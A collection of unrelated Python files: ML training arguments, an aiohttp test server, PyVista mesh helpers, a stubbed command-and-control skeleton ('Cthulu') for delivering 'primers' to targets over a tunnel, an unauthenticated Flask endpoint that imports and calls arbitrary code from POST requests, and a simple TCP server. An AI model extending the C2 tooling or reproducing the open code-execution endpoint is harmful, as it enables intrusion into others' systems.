parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('--save_path', default='', type=str, metavar='PATH',
help='output path for training checkpoints/output images')
parser.add_argument('--save_iter', default=1, type=int,
help='number of training iterations between'
'checkpoint history saves')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
args = parser.parse_args()
assert args.classes > 0
print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
testserver.py
|
import socket
import asyncio
import threading
import time
from json import dumps
from aiohttp import web
class Response(web.Response):
def __init__(self, *, json=None, **kwargs):
if json is not None:
text = dumps(json)
content_type = "application/json"
kwargs.update(text=text, content_type=content_type)
super().__init__(**kwargs)
class HandlerBuilder:
def __init__(self):
self.response = web.HTTPOk()
self.delay = 0
self.path = None
self.method = None
def with_response(self, response: web.Response):
self.response = response
return self
def with_delay(self, delay: float):
self.delay = delay
return self
def with_path(self, path: str):
self.path = path
return self
def with_method(self, method: str):
self.method = method
return self
class TestHttpServer:
def __init__(self, host=None, port=None):
self._host = host or "localhost"
self._port = port or self._find_free_port()
self._ready = threading.Semaphore(0)
self._enqueued = []
self._thread = None
self._loop = None
self._app = None
self._app_runner = None
@property
def host(self):
return self._host
@property
def port(self):
return self._port
def start(self):
self._loop = asyncio.new_event_loop()
self._app = web.Application(loop=self._loop)
self._app.add_routes([web.route("*", "/{tail:.*}", self._handle)])
self._app_runner = web.AppRunner(self._app)
self._thread = threading.Thread(target=self._run_loop)
self._thread.daemon = True
self._thread.start()
self._ready.acquire()
def stop(self):
self._loop.call_soon_threadsafe(self._app_runner.shutdown())
self._loop.call_soon_threadsafe(self._app_runner.cleanup())
self._loop.stop()
self._thread.join()
self._loop.close()
self._thread = None
self._loop = None
self._app = None
self._app_runner = None
def enqueue(self, response: web.Response) -> HandlerBuilder:
handler_builder = HandlerBuilder().with_response(response)
self._enqueued.append(handler_builder)
return handler_builder
def reset(self):
self._enqueued = []
def _handle(self, request: web.Request) -> web.Response:
def match_path(handler_, request_):
return handler_.path is None or handler_.path == request_.path
def match_method(handler_, request_):
return handler_.method is None or handler_.method == "*" or \
str(handler_.method).lower() == str(request_.method).lower()
matching_handlers = [
(idx, handler)
for idx, handler in enumerate(self._enqueued)
if match_path(handler, request) and match_method(handler, request)
]
if matching_handlers == []:
raise AssertionError()
idx, handler = matching_handlers[0]
self._enqueued.pop(idx)
if handler.delay is not None and handler.delay > 0:
time.sleep(handler.delay)
return handler.response
def _run_loop(self):
self._loop.run_until_complete(self._app_runner.setup())
site = web.TCPSite(self._app_runner, host=self._host, port=self._port)
self._loop.run_until_complete(site.start())
self._ready.release()
self._loop.run_forever()
def _find_free_port(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
|
helpers.py
|
"""Supporting functions for polydata and grid objects."""
import collections.abc
import enum
import logging
import signal
import sys
import warnings
from threading import Thread
import threading
import traceback
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Returns
-------
int : the integer type id specified in vtkType.h
"""
typ = nps.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
-----------
arr : ndarray or vtkDataArry
A numpy array or vtkDataArry to convert
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Returns
-------
vtkDataArray, ndarray, or DataFrame:
the converted array (if input is a NumPy ndaray then returns
``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy
``ndarray``). If pdf==True and the input is ``vtkDataArry``,
return a pandas DataFrame.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return nps.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.Common, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r',]:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy points to a vtkPoints object."""
if not points.flags['C_CONTIGUOUS']:
points = np.ascontiguousarray(points)
vtkpts = vtk.vtkPoints()
vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep))
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of points
are
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be given as
every two vertices represent a single line segment. For example, two
line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other line.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> lines.plot() # doctest:+SKIP
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0],], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape (N, 3) storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape (M, 3) containing the triangle
indices.
Returns
-------
tri_mesh : pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista as pv
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True) # doctest:+SKIP
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = vtk.vtkPoints()
vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to a ``numpy.ndarray``.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
"""
if isinstance(matrix, vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
wrapped_dataset : pyvista class
The `pyvista` wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
Wrap a VTK object
>>> import pyvista
>>> import vtk
>>> points = vtk.vtkPoints()
>>> p = [1.0, 2.0, 3.0]
>>> vertices = vtk.vtkCellArray()
>>> pid = points.InsertNextPoint(p)
>>> _ = vertices.InsertNextCell(1)
>>> _ = vertices.InsertCellPoint(pid)
>>> point = vtk.vtkPolyData()
>>> _ = point.SetPoints(points)
>>> _ = point.SetVerts(vertices)
>>> mesh = pyvista.wrap(point)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
N Cells: 1
N Points: 3
X Bounds: 0.000e+00, 0.000e+00
Y Bounds: 0.000e+00, 1.000e+00
Z Bounds: 0.000e+00, 1.000e+00
N Arrays: 0
"""
wrappers = {
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Otherwise, we assume a VTK data object was passed
if hasattr(dataset, 'GetClassName'):
key = dataset.GetClassName()
elif dataset is None:
return None
elif isinstance(dataset, np.ndarray):
if dataset.ndim == 1 and dataset.shape[0] == 3:
return pyvista.PolyData(dataset)
if dataset.ndim > 1 and dataset.ndim < 3 and dataset.shape[1] == 3:
return pyvista.PolyData(dataset)
elif dataset.ndim == 3:
mesh = pyvista.UniformGrid(dataset.shape)
mesh['values'] = dataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
print(dataset.shape, dataset)
raise NotImplementedError('NumPy array could not be converted to PyVista.')
elif is_meshio_mesh(dataset):
return from_meshio(dataset)
elif dataset.__class__.__name__ == 'Trimesh':
# trimesh doesn't pad faces
n_face = dataset.faces.shape[0]
faces = np.empty((n_face, 4), dataset.faces.dtype)
faces[:, 1:] = dataset.faces
faces[:, 0] = 3
return pyvista.PolyData(np.asarray(dataset.vertices), faces)
else:
raise NotImplementedError(f'Type ({type(dataset)}) not able to be wrapped into a PyVista mesh.')
try:
wrapped = wrappers[key](dataset)
except KeyError:
logging.warning(f'VTK data type ({key}) is not currently supported by pyvista.')
return dataset # if not supported just passes the VTK data object
return wrapped
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError(f'Unknown input data type ({type(point)}).')
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
return_meta : bool
If true, also returns the center and normal used to generate the plane
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, vtk.vtkTable):
raise ValueError(f'Number of scalars ({scalars.size}) must match number of rows ({mesh.n_rows}).')
raise ValueError(f'Number of scalars ({scalars.size}) ' +
f'must match either the number of points ({mesh.n_points}) ' +
f'or the number of cells ({mesh.n_cells}).')
def generate_plane(normal, origin):
"""Return a vtk.vtkPlane."""
plane = vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception:
etype, exc, tb = sys.exc_info()
stack = traceback.extract_tb(tb)[1:]
formatted_exception = \
'Encountered issue in callback (most recent call last):\n' + \
''.join(traceback.format_list(stack) +
traceback.format_exception_only(etype, exc)).rstrip('\n')
logging.warning(formatted_exception)
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the current
environment. Returns ``True`` if depth peeling is available and has been
successfully leveraged, otherwise ``False``.
"""
# Try Depth Peeling with a basic scene
source = vtk.vtkSphereSource()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError(f'{cls.__name__} is an abstract class and may not be instantiated.')
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
def axis_rotation(points, angle, inplace=False, deg=True, axis='z'):
"""Rotate points angle (in deg) about an axis."""
axis = axis.lower()
# Copy original array to if not inplace
if not inplace:
points = points.copy()
# Convert angle to radians
if deg:
angle *= np.pi / 180
if axis == 'x':
y = points[:, 1] * np.cos(angle) - points[:, 2] * np.sin(angle)
z = points[:, 1] * np.sin(angle) + points[:, 2] * np.cos(angle)
points[:, 1] = y
points[:, 2] = z
elif axis == 'y':
x = points[:, 0] * np.cos(angle) + points[:, 2] * np.sin(angle)
z = - points[:, 0] * np.sin(angle) + points[:, 2] * np.cos(angle)
points[:, 0] = x
points[:, 2] = z
elif axis == 'z':
x = points[:, 0] * np.cos(angle) - points[:, 1] * np.sin(angle)
y = points[:, 0] * np.sin(angle) + points[:, 1] * np.cos(angle)
points[:, 0] = x
points[:, 1] = y
else:
raise ValueError('invalid axis. Must be either "x", "y", or "z"')
if not inplace:
return points
|
Cthulu.py
|
# @author Stefano Sesia all rights reserved
# Cthulu command and control center
# Requires sudo apt-get install mingw-w64
# Library Imports
from CommunicationTunnelServer import *
from TrivialFunctions import *
from WebServer import *
import constants
# Constants
PORT = 8000
#Functions
def setKey(passphrase):
constants.key = passphrase
def initializeWebServer():
output(0,"step","Initializing the server for primers delivery")
try:
threadedSimpleServer()
return True
except:
output(1,"error","There was an error starting the server, quitting...")
return False
def generatePrimer(platform):
output(0,"step","Generating the primers")
if platform == "WIN":
output(1,"progress","Target is running a Windows OS")
elif platform == "UNIX":
output(1, "progress", "Target is running a Unix OS")
else:
output(1,"error","OS not yet supported")
return False
def attack():
output(2, "warning", "function not yet implemented")
def tunnel():
output(0,"step","Starting the comms tunnel")
## This module can later be changed to include dnscat
tunnelThread = threading.Thread(target=startTunnel)
#tunnelThread.daemon = True
tunnelThread.start()
def main():
print("0--------------------------------------------------0")
print("| Greetings adventurer, |")
print("| Thou halt invoked the presence of a Great Old One|")
print("| Cthulu is listening, use this power wisely! |")
print("| ^(;,;)^ |")
print("0--------------------------------------------------0\n")
if not initializeWebServer():
return()
output(0, "step", "Generating a random key for the communication tunnel")
setKey(generateRandomKey())
output(1, "info", "The key is: " + constants.key)
if not writePrimerHeader(constants.key):
return()
tunnel()
main()
|
app.py
|
import importlib
import sys
import threading
from pathlib import Path
from flask import Flask, request
app = Flask(__name__)
SCRIPTS_PATH = 'scripts'
mod = None
def run_script_thread(script_name, script_arguments):
global mod
print("Running script {} with arguments {}".format(script_name, script_arguments))
sys.argv[1:] = script_arguments
script_name = script_name.replace(".py", "")
try:
mod = importlib.import_module(SCRIPTS_PATH + "." + script_name)
except Exception as e:
print("Error importing script {}".format(e))
return "Script {} returned error".format(e)
return "OK"
def run_method_thread(method_name, method_arguments):
global mod
print("Running method {} with arguments {}".format(method_name, method_arguments))
try:
if method_arguments:
function = getattr(mod, method_name)
result = function(*method_arguments)
else:
result = getattr(mod, method_name)()
except Exception as e:
print("Error calling method {}".format(e))
return "Script {} returned error".format(e)
return "OK"
@app.route('/method', methods=['POST'])
def call_specific_method():
global mod
params = request.json
method_name = params['method_name'] if 'method_name' in params else None
method_arguments = params['method_arguments'] if 'method_arguments' in params else None
if method_name:
try:
x = threading.Thread(target=run_method_thread, args=(method_name, method_arguments))
x.start()
x.join()
except Exception as e:
return "Script {} returned error".format(e), 405
return "Called method", 200
return "Method can't be null", 400
@app.route('/script', methods=['POST'])
def run_script():
# Get the script from the request
script = request.json
script_name = script['script_name']
script_arguments = script['script_arguments']
try:
x = threading.Thread(target=run_script_thread, args=(script_name, script_arguments))
x.start()
x.join()
except Exception as e:
return "Script {} returned error".format(e)
return "200"
if __name__ == '__main__':
Path("./scripts").mkdir(parents=True, exist_ok=True)
app.run(host='0.0.0.0', port=9090)
|
03_tcp_server.py
|
"""
Quick spool TCP server, using built in socket module
"""
import socket
import threading
bind_ip = '0.0.0.0'
bind_port = 9999
# Create client socket, using IPv4 and TCP socket type
server = socket.socket(family=socket.AF_INET,
type=socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
# Threadable client handler
def handle_client(client_socket: socket.socket):
# Catch and print what client sent
request = client_socket.recv(1024)
print(f" [*] Received\n")
print(request.decode("utf-8"))
# Respond with generic ACK
client_socket.send(b"ACK!")
client_socket.close()
print(f"[*] Listening on {bind_ip}:{bind_port}")
runs = 3
while runs != 0:
client, addr = server.accept()
print(f" [*] Accepted connection from {addr[0]}:{addr[1]}")
# Spin thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
